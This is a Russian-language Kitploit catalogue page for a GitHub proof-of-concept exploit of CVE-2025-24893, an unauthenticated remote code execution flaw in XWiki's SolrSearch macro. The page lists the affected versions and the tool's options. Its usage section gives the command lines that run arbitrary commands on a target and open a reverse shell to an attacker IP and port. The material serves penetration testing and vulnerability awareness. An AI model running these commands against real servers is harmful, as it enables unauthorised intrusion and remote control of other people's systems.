Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24893-PoC — Эксплойт XWiki без аутентификации для RCE через Reverse Shell | Kitploit
Инструменты/GitHubGitHub/80ottanta80/cve-2025-24893-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub80ottanta80/cve-2025-24893-poc

CVE-2025-24893-PoC

Эксплойт XWiki без аутентификации для RCE через Reverse Shell

Репозиторий
110 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24893-PoC

Эксплойт неаутентифицированного RCE в XWiki

Затронутые версии XWiki

  • Версии < 15.10.11
  • Версии < 16.4.1
  • Версии < 16.5.0RC1

Описание уязвимости

Затронутые версии XWiki содержат уязвимость удаленного выполнения кода (RCE), вызванную небезопасной обработкой Groovy-выражений в макросе SolrSearch. Неаутентифицированные злоумышленники могут удаленно выполнить произвольный Groovy-код и получить обратный шелл (reverse shell).

Подтверждение концепции (Proof of Concept)

Этот эксплойт можно использовать для выполнения кода на целевой машине, а также для установки обратного шелла. Доступны два режима: интерактивный или на основе параметров. Эксплойт может автоматически запустить слушатель или использовать существующий.

XWiki Интерактивный вывод

Предварительные требования

Компьютер атакующего

  • Python 3
  • Скрипт эксплойта
  • Netcat (если не используется автоматический слушатель)

Целевая машина

  • Уязвимая версия XWiki
  • Сетевое подключение к машине атакующего

Использование

Интерактивный режим

root@kitploit:~
python3 xwiki_groovy_rce.py

Режим параметров

root@kitploit:~
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com

# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480

# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener

Параметры

-h/--help: Показать справку

-u/--url: URL целевого XWiki (обязательно)

-r/--reverse-shell: Выполнить обратный шелл

-c/--command: Выполнить одну команду

-i/--ip: Указать IP слушателя (только для обратного шелла)

-p/--port: Указать порт слушателя (только для обратного шелла, по умолчанию=4444)

--no-listener: Не запускать слушатель (только для обратного шелла)

Ссылки

  • https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  • https://www.offsec.com/blog/cve-2025-24893/

Юридическое предупреждение

Это подтверждение концепции (proof-of-concept) предназначено только для образовательных и авторизованных целей тестирования.

Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным.

Авторы не несут ответственности за любое неправомерное использование этой информации.

Скачать инструмент